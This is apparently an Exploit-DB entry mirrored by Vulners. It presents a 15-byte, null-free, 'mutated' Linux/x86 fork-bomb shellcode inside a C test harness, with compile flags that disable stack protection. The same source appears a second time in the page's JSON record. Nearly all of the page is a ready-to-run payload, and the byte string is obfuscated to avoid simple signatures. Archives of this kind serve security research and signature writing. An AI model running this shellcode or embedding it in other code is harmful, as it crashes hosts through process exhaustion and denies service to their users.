Search...

Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)

2013-01-01T00:00:00

ID EDB-ID:43738
Type exploitdb
Reporter Exploit-DB
Modified 2013-01-01T00:00:00

Description

Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes). Shellcode exploit for Linux_x86 platform

                                        
                                            /*

   Mutated Fork Bomb Shellcode - C Language - Linux/x86
   Copyright (C) 2013 Geyslan G. Bem, Hacking bits

   http://hackingbits.com
   geyslan@gmail.com

   This program is free software: you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation, either version 3 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program.  If not, see &lt;http://www.gnu.org/licenses/&gt;.

*/

/*

   mutated_fork_bomb_shellcode

   * 15 bytes
   * null-free
   * mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)


   # gcc -m32 -fno-stack-protector -z execstack mutated_fork_bomb_shellcode.c -o mutated_fork_bomb_shellcode

   Testing
   * Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!

*/


#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

unsigned char shellcode[] = \

              "\x31\xff\xeb\x01\xe8\xb2\x1d\x97\x83\xe8"
              "\x1b\xcd\x80\xeb\xf1";


main ()
{

    // When contains null bytes, printf will show a wrong shellcode length.

    printf("Shellcode Length:  %d\n", strlen(shellcode));

    // Pollutes all registers ensuring that the shellcode runs in any circumstance.

    __asm__ ("movl $0xffffffff, %eax\n\t"
            "movl %eax, %ebx\n\t"
            "movl %eax, %ecx\n\t"
            "movl %eax, %edx\n\t"
            "movl %eax, %esi\n\t"
            "movl %eax, %edi\n\t"
            "movl %eax, %ebp\n\t"

            // Calling the shellcode
            "call shellcode");

}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:43738", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes)", "description": "Linux/x86 - Fork Bomb + Mutated + Null-Free Shellcode (15 bytes). Shellcode exploit for Linux_x86 platform", "published": "2013-01-01T00:00:00", "modified": "2013-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/43738/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2018-01-24T14:26:14", "viewCount": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-01-24T14:26:14", "rev": 2}, "dependencies": {"references": [], "modified": "2018-01-24T14:26:14", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://www.exploit-db.com/download/43738/", "sourceData": "/*\r\n\r\n Mutated Fork Bomb Shellcode - C Language - Linux/x86\r\n Copyright (C) 2013 Geyslan G. Bem, Hacking bits\r\n\r\n http://hackingbits.com\r\n geyslan@gmail.com\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n\r\n*/\r\n\r\n/*\r\n\r\n mutated_fork_bomb_shellcode\r\n\r\n * 15 bytes\r\n * null-free\r\n * mutated isn't polymorphic (shellcode does not replicate itself to be called polymorphic)\r\n\r\n\r\n # gcc -m32 -fno-stack-protector -z execstack mutated_fork_bomb_shellcode.c -o mutated_fork_bomb_shellcode\r\n\r\n Testing\r\n * Only run it in a Virtual Machine!!! Your system will crash. Use at your own risk!\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n\r\nunsigned char shellcode[] = \\\r\n\r\n \"\\x31\\xff\\xeb\\x01\\xe8\\xb2\\x1d\\x97\\x83\\xe8\"\r\n \"\\x1b\\xcd\\x80\\xeb\\xf1\";\r\n\r\n\r\nmain ()\r\n{\r\n\r\n // When contains null bytes, printf will show a wrong shellcode length.\r\n\r\n printf(\"Shellcode Length: %d\\n\", strlen(shellcode));\r\n\r\n // Pollutes all registers ensuring that the shellcode runs in any circumstance.\r\n\r\n __asm__ (\"movl $0xffffffff, %eax\\n\\t\"\r\n \"movl %eax, %ebx\\n\\t\"\r\n \"movl %eax, %ecx\\n\\t\"\r\n \"movl %eax, %edx\\n\\t\"\r\n \"movl %eax, %esi\\n\\t\"\r\n \"movl %eax, %edi\\n\\t\"\r\n \"movl %eax, %ebp\\n\\t\"\r\n\r\n // Calling the shellcode\r\n \"call shellcode\");\r\n\r\n}", "osvdbidlist": []}